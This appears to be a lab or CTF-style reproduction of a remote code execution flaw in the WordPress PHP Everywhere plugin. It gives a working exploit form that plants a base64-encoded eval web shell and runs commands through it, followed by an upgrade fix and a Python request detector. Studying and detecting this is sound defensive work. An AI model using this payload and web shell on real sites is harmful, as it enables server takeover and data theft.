Product Introduction
WordPress began as a personal blogging system and has gradually evolved into a content management system. It is written in PHP and uses a MySQL database, so users can host their own sites on any server that supports PHP and MySQL.
Vulnerability Overview
Any user with at least the subscriber role can exploit this vulnerability by sending a request whose "shortcode" parameter contains a PHP Everywhere shortcode, which executes arbitrary PHP code on the site.
Scope of Impact
Affected plugin: PHP Everywhere
Affected versions: <= 2.0.3
Exploitation Process
Access the backend address:
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin
Account: test/test
Delete the content below the dashboard, press F12 in the browser to open the developer tools, add a new node, and enter the following form:
<form
action="http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
method="post"
>
<input name="action" value="parse-media-shortcode" />
<textarea name="shortcode">
[php_everywhere] <?php file_put_contents("/var/www/html/111.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4=")); ?>[/php_everywhere]</textarea>
<input type="submit" value="Execute" />
</form>
Then submit the form (click Execute) and access the following link:
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php
The page returns 200.
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=phpinfo();
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=system(%27tac%20/f*%27);
Fix Suggestions
- Upgrade the PHP Everywhere plugin to a version newer than 2.0.3.
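
Until the plugin is upgraded, requests matching the pattern shown in the exploitation process can be flagged in captured request bodies, for example from a WAF or reverse-proxy audit log. The Python below is an added example, not part of the original write-up; the function name inspect_request, the (method, path, body) record shape and the sample requests are assumptions constructed for illustration.

```python
import base64
import re
from urllib.parse import parse_qs, urlencode

# Shortcode tag used in the form above.
TAG = re.compile(r"\[\s*php_everywhere\b", re.I)
# String literals passed to base64_decode(), decoded so an analyst sees the hidden payload.
B64_ARG = re.compile(r"base64_decode\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)")

def inspect_request(method, path, body):
    """Return a finding dict if the request matches the pattern on this page, else None."""
    url_path, _, query = path.partition("?")
    if method.upper() != "POST" or not url_path.endswith("/wp-admin/admin-ajax.php"):
        return None
    # admin-ajax.php accepts the action from the query string or the POST body.
    form = parse_qs(query + "&" + body, keep_blank_values=True)
    if "parse-media-shortcode" not in form.get("action", []):
        return None
    shortcode = " ".join(form.get("shortcode", []))
    if not TAG.search(shortcode):
        return None
    decoded = []
    for blob in B64_ARG.findall(shortcode):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            decoded.append("<undecodable>")
    return {"path": url_path, "shortcode": shortcode, "decoded": decoded}

# Constructed sample records: the first reuses the shortcode body shown on this page,
# the other two are benign admin-ajax.php traffic that must not be flagged.
PAGE_SHORTCODE = (
    '[php_everywhere] <?php file_put_contents("/var/www/html/111.php", '
    'base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4=")); ?>[/php_everywhere]'
)
SAMPLE_REQUESTS = [
    ("POST", "/wp-admin/admin-ajax.php",
     urlencode({"action": "parse-media-shortcode", "shortcode": PAGE_SHORTCODE})),
    ("POST", "/wp-admin/admin-ajax.php",
     urlencode({"action": "parse-media-shortcode", "shortcode": '[gallery ids="1,2"]'})),
    ("POST", "/wp-admin/admin-ajax.php", urlencode({"action": "heartbeat"})),
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(request[1], "->", inspect_request(*request))
```

A finding on a site running an affected version should be followed by a check of the web root for unexpected new .php files, since the request on this page writes one.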